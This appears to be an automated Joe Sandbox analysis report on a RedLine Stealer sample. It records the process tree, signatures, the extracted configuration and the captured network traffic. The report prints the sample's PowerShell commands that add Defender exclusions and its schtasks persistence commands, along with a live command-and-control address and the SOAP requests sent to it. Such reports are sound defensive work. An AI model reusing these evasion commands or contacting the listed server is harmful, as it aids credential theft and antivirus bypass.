Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
I5pvP0CU6M.exe

Overview

General Information

Sample name:I5pvP0CU6M.exe
renamed because original name is a hash value
Original sample name:68b2a6e71c0c904a9aeabfc9adbf7a21.exe
Analysis ID:1548177
MD5:68b2a6e71c0c904a9aeabfc9adbf7a21
SHA1:0577bcb0a9736b45f1eb92f6070aac2134e674dc
SHA256:f6b09208c3523be3a490af2fc305d4574b38d95a435c8a55402fca38597e6dac
Tags:exeRedLineStealeruser-abuse_ch
Infos:

Detection

RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected RedLine Stealer
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses known network protocols on non-standard ports
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • I5pvP0CU6M.exe (PID: 2432 cmdline: "C:\Users\user\Desktop\I5pvP0CU6M.exe" MD5: 68B2A6E71C0C904A9AEABFC9ADBF7A21)
    • powershell.exe (PID: 4788 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\I5pvP0CU6M.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 3416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5580 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\VcihjWRO.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 4900 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7240 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 5720 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VcihjWRO" /XML "C:\Users\user\AppData\Local\Temp\tmp4733.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 2760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • I5pvP0CU6M.exe (PID: 6724 cmdline: "C:\Users\user\Desktop\I5pvP0CU6M.exe" MD5: 68B2A6E71C0C904A9AEABFC9ADBF7A21)
      • conhost.exe (PID: 5552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • VcihjWRO.exe (PID: 7224 cmdline: C:\Users\user\AppData\Roaming\VcihjWRO.exe MD5: 68B2A6E71C0C904A9AEABFC9ADBF7A21)
    • schtasks.exe (PID: 7472 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VcihjWRO" /XML "C:\Users\user\AppData\Local\Temp\tmp7075.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • VcihjWRO.exe (PID: 7556 cmdline: "C:\Users\user\AppData\Roaming\VcihjWRO.exe" MD5: 68B2A6E71C0C904A9AEABFC9ADBF7A21)
    • VcihjWRO.exe (PID: 7568 cmdline: "C:\Users\user\AppData\Roaming\VcihjWRO.exe" MD5: 68B2A6E71C0C904A9AEABFC9ADBF7A21)
      • conhost.exe (PID: 7588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
RedLine StealerRedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Malware Configuration

Threatname: RedLine

{"C2 url": ["45.137.22.248:55615"], "Bot Id": "cheat"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security
    dump.pcapJoeSecurity_RedLineYara detected RedLine StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000009.00000002.2322211102.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000009.00000002.2322211102.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
          00000009.00000002.2322211102.0000000000402000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_f54632ebunknownunknown
          • 0x133ca:$a4: get_ScannedWallets
          • 0x12228:$a5: get_ScanTelegram
          • 0x1304e:$a6: get_ScanGeckoBrowsersPaths
          • 0x10e6a:$a7: <Processes>k__BackingField
          • 0xed7c:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
          • 0x1079e:$a9: <ScanFTP>k__BackingField
          0000000B.00000002.2316828394.0000000004445000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            0000000B.00000002.2316828394.0000000004445000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
              Click to see the 17 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              11.2.VcihjWRO.exe.4445bf8.1.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                11.2.VcihjWRO.exe.4445bf8.1.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                  11.2.VcihjWRO.exe.4445bf8.1.unpackWindows_Trojan_RedLineStealer_f54632ebunknownunknown
                  • 0x117ca:$a4: get_ScannedWallets
                  • 0x10628:$a5: get_ScanTelegram
                  • 0x1144e:$a6: get_ScanGeckoBrowsersPaths
                  • 0xf26a:$a7: <Processes>k__BackingField
                  • 0xd17c:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
                  • 0xeb9e:$a9: <ScanFTP>k__BackingField
                  11.2.VcihjWRO.exe.4445bf8.1.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
                  • 0xe68a:$u7: RunPE
                  • 0x11d41:$u8: DownloadAndEx
                  • 0x7330:$pat14: , CommandLine:
                  • 0x11279:$v2_1: ListOfProcesses
                  • 0xe88b:$v2_2: get_ScanVPN
                  • 0xe92e:$v2_2: get_ScanFTP
                  • 0xf61e:$v2_2: get_ScanDiscord
                  • 0x1060c:$v2_2: get_ScanSteam
                  • 0x10628:$v2_2: get_ScanTelegram
                  • 0x106ce:$v2_2: get_ScanScreen
                  • 0x11416:$v2_2: get_ScanChromeBrowsersPaths
                  • 0x1144e:$v2_2: get_ScanGeckoBrowsersPaths
                  • 0x11709:$v2_2: get_ScanBrowsers
                  • 0x117ca:$v2_2: get_ScannedWallets
                  • 0x117f0:$v2_2: get_ScanWallets
                  • 0x11810:$v2_3: GetArguments
                  • 0xfed9:$v2_4: VerifyUpdate
                  • 0x147ea:$v2_4: VerifyUpdate
                  • 0x11bca:$v2_5: VerifyScanRequest
                  • 0x112c6:$v2_6: GetUpdates
                  • 0x147cb:$v2_6: GetUpdates
                  11.2.VcihjWRO.exe.445da18.3.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                    Click to see the 31 entries

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\I5pvP0CU6M.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\I5pvP0CU6M.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\I5pvP0CU6M.exe", ParentImage: C:\Users\user\Desktop\I5pvP0CU6M.exe, ParentProcessId: 2432, ParentProcessName: I5pvP0CU6M.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\I5pvP0CU6M.exe", ProcessId: 4788, ProcessName: powershell.exe
                    Sigma detected: Powershell Defender Exclusion
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\I5pvP0CU6M.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\I5pvP0CU6M.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\I5pvP0CU6M.exe", ParentImage: C:\Users\user\Desktop\I5pvP0CU6M.exe, ParentProcessId: 2432, ParentProcessName: I5pvP0CU6M.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\I5pvP0CU6M.exe", ProcessId: 4788, ProcessName: powershell.exe
                    Sigma detected: Suspicious Add Scheduled Task Parent
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VcihjWRO" /XML "C:\Users\user\AppData\Local\Temp\tmp7075.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VcihjWRO" /XML "C:\Users\user\AppData\Local\Temp\tmp7075.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\VcihjWRO.exe, ParentImage: C:\Users\user\AppData\Roaming\VcihjWRO.exe, ParentProcessId: 7224, ParentProcessName: VcihjWRO.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VcihjWRO" /XML "C:\Users\user\AppData\Local\Temp\tmp7075.tmp", ProcessId: 7472, ProcessName: schtasks.exe
                    Sigma detected: Suspicious Schtasks From Env Var Folder
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VcihjWRO" /XML "C:\Users\user\AppData\Local\Temp\tmp4733.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VcihjWRO" /XML "C:\Users\user\AppData\Local\Temp\tmp4733.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\I5pvP0CU6M.exe", ParentImage: C:\Users\user\Desktop\I5pvP0CU6M.exe, ParentProcessId: 2432, ParentProcessName: I5pvP0CU6M.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VcihjWRO" /XML "C:\Users\user\AppData\Local\Temp\tmp4733.tmp", ProcessId: 5720, ProcessName: schtasks.exe
                    Sigma detected: Non Interactive PowerShell Process Spawned
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\I5pvP0CU6M.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\I5pvP0CU6M.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\I5pvP0CU6M.exe", ParentImage: C:\Users\user\Desktop\I5pvP0CU6M.exe, ParentProcessId: 2432, ParentProcessName: I5pvP0CU6M.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\I5pvP0CU6M.exe", ProcessId: 4788, ProcessName: powershell.exe

                    Persistence and Installation Behavior

                    barindex
                    Sigma detected: Scheduled temp file as task from temp location
                    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VcihjWRO" /XML "C:\Users\user\AppData\Local\Temp\tmp4733.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VcihjWRO" /XML "C:\Users\user\AppData\Local\Temp\tmp4733.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\I5pvP0CU6M.exe", ParentImage: C:\Users\user\Desktop\I5pvP0CU6M.exe, ParentProcessId: 2432, ParentProcessName: I5pvP0CU6M.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VcihjWRO" /XML "C:\Users\user\AppData\Local\Temp\tmp4733.tmp", ProcessId: 5720, ProcessName: schtasks.exe

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-04T04:32:12.999384+010020229301A Network Trojan was detected4.175.87.197443192.168.2.649763TCP
                    2024-11-04T04:32:50.939185+010020229301A Network Trojan was detected4.175.87.197443192.168.2.649984TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-04T04:32:09.774888+010020450001Malware Command and Control Activity Detected45.137.22.24855615192.168.2.649718TCP
                    2024-11-04T04:32:20.283399+010020450001Malware Command and Control Activity Detected45.137.22.24855615192.168.2.649784TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-04T04:32:13.527487+010020450011Malware Command and Control Activity Detected45.137.22.24855615192.168.2.649718TCP
                    2024-11-04T04:32:23.737177+010020450011Malware Command and Control Activity Detected45.137.22.24855615192.168.2.649784TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-04T04:32:04.724301+010028496621Malware Command and Control Activity Detected192.168.2.64971845.137.22.24855615TCP
                    2024-11-04T04:32:15.174201+010028496621Malware Command and Control Activity Detected192.168.2.64978445.137.22.24855615TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-04T04:32:10.039181+010028493511Malware Command and Control Activity Detected192.168.2.64971845.137.22.24855615TCP
                    2024-11-04T04:32:20.816931+010028493511Malware Command and Control Activity Detected192.168.2.64978445.137.22.24855615TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-04T04:32:13.584322+010028493521Malware Command and Control Activity Detected192.168.2.64977745.137.22.24855615TCP
                    2024-11-04T04:32:24.140389+010028493521Malware Command and Control Activity Detected192.168.2.64983745.137.22.24855615TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus / Scanner detection for submitted sample
                    Source: I5pvP0CU6M.exeAvira: detected
                    Found malware configuration
                    Source: 11.2.VcihjWRO.exe.4445bf8.1.raw.unpackMalware Configuration Extractor: RedLine {"C2 url": ["45.137.22.248:55615"], "Bot Id": "cheat"}
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeReversingLabs: Detection: 68%
                    Multi AV Scanner detection for submitted file
                    Source: I5pvP0CU6M.exeReversingLabs: Detection: 68%
                    Source: I5pvP0CU6M.exeVirustotal: Detection: 65%Perma Link
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Machine Learning detection for sample
                    Source: I5pvP0CU6M.exeJoe Sandbox ML: detected
                    Source: I5pvP0CU6M.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: I5pvP0CU6M.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeCode function: 4x nop then jmp 070277EFh11_2_07026E1F

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.6:49718 -> 45.137.22.248:55615
                    Source: Network trafficSuricata IDS: 2045000 - Severity 1 - ET MALWARE RedLine Stealer - CheckConnect Response : 45.137.22.248:55615 -> 192.168.2.6:49718
                    Source: Network trafficSuricata IDS: 2849351 - Severity 1 - ETPRO MALWARE RedLine - EnvironmentSettings Request : 192.168.2.6:49718 -> 45.137.22.248:55615
                    Source: Network trafficSuricata IDS: 2045001 - Severity 1 - ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound : 45.137.22.248:55615 -> 192.168.2.6:49718
                    Source: Network trafficSuricata IDS: 2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.6:49784 -> 45.137.22.248:55615
                    Source: Network trafficSuricata IDS: 2849352 - Severity 1 - ETPRO MALWARE RedLine - SetEnvironment Request : 192.168.2.6:49777 -> 45.137.22.248:55615
                    Source: Network trafficSuricata IDS: 2045000 - Severity 1 - ET MALWARE RedLine Stealer - CheckConnect Response : 45.137.22.248:55615 -> 192.168.2.6:49784
                    Source: Network trafficSuricata IDS: 2849351 - Severity 1 - ETPRO MALWARE RedLine - EnvironmentSettings Request : 192.168.2.6:49784 -> 45.137.22.248:55615
                    Source: Network trafficSuricata IDS: 2045001 - Severity 1 - ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound : 45.137.22.248:55615 -> 192.168.2.6:49784
                    Source: Network trafficSuricata IDS: 2849352 - Severity 1 - ETPRO MALWARE RedLine - SetEnvironment Request : 192.168.2.6:49837 -> 45.137.22.248:55615
                    C2 URLs / IPs found in malware configuration
                    Source: Malware configuration extractorURLs: 45.137.22.248:55615
                    Uses known network protocols on non-standard ports
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49718
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49718
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49784
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49784
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49777
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49777
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49784
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49784
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49837
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49837
                    Source: global trafficTCP traffic: 192.168.2.6:49718 -> 45.137.22.248:55615
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 45.137.22.248:55615Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: 45.137.22.248:55615Content-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflate
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: 45.137.22.248:55615Content-Length: 960380Expect: 100-continueAccept-Encoding: gzip, deflate
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 45.137.22.248:55615Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: 45.137.22.248:55615Content-Length: 960372Expect: 100-continueAccept-Encoding: gzip, deflate
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: 45.137.22.248:55615Content-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflate
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: 45.137.22.248:55615Content-Length: 959930Expect: 100-continueAccept-Encoding: gzip, deflate
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: 45.137.22.248:55615Content-Length: 959922Expect: 100-continueAccept-Encoding: gzip, deflate
                    Source: Joe Sandbox ViewASN Name: ROOTLAYERNETNL ROOTLAYERNETNL
                    Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.175.87.197:443 -> 192.168.2.6:49984
                    Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.175.87.197:443 -> 192.168.2.6:49763
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.248
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.248
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.248
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.248
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.248
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.248
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.248
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.248
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.248
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.248
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.248
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.248
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.248
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.248
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.248
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.248
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.248
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.248
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.248
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.248
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.248
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.248
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.248
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.248
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.248
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.248
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.248
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.248
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.248
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.248
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.248
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.248
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.248
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.248
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.248
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.248
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.248
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.248
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.248
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.248
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.248
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.248
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.248
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.248
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.248
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.248
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.248
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.248
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.248
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.248
                    Source: global trafficDNS traffic detected: DNS query: api.ip.sb
                    Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 45.137.22.248:55615Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                    Source: I5pvP0CU6M.exe, 00000009.00000002.2325569956.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, I5pvP0CU6M.exe, 00000009.00000002.2325569956.0000000002DFB000.00000004.00000800.00020000.00000000.sdmp, I5pvP0CU6M.exe, 00000009.00000002.2325569956.0000000002BC0000.00000004.00000800.00020000.00000000.sdmp, VcihjWRO.exe, 00000011.00000002.2427530855.0000000003301000.00000004.00000800.00020000.00000000.sdmp, VcihjWRO.exe, 00000011.00000002.2427530855.0000000003392000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.137.22.248:55615
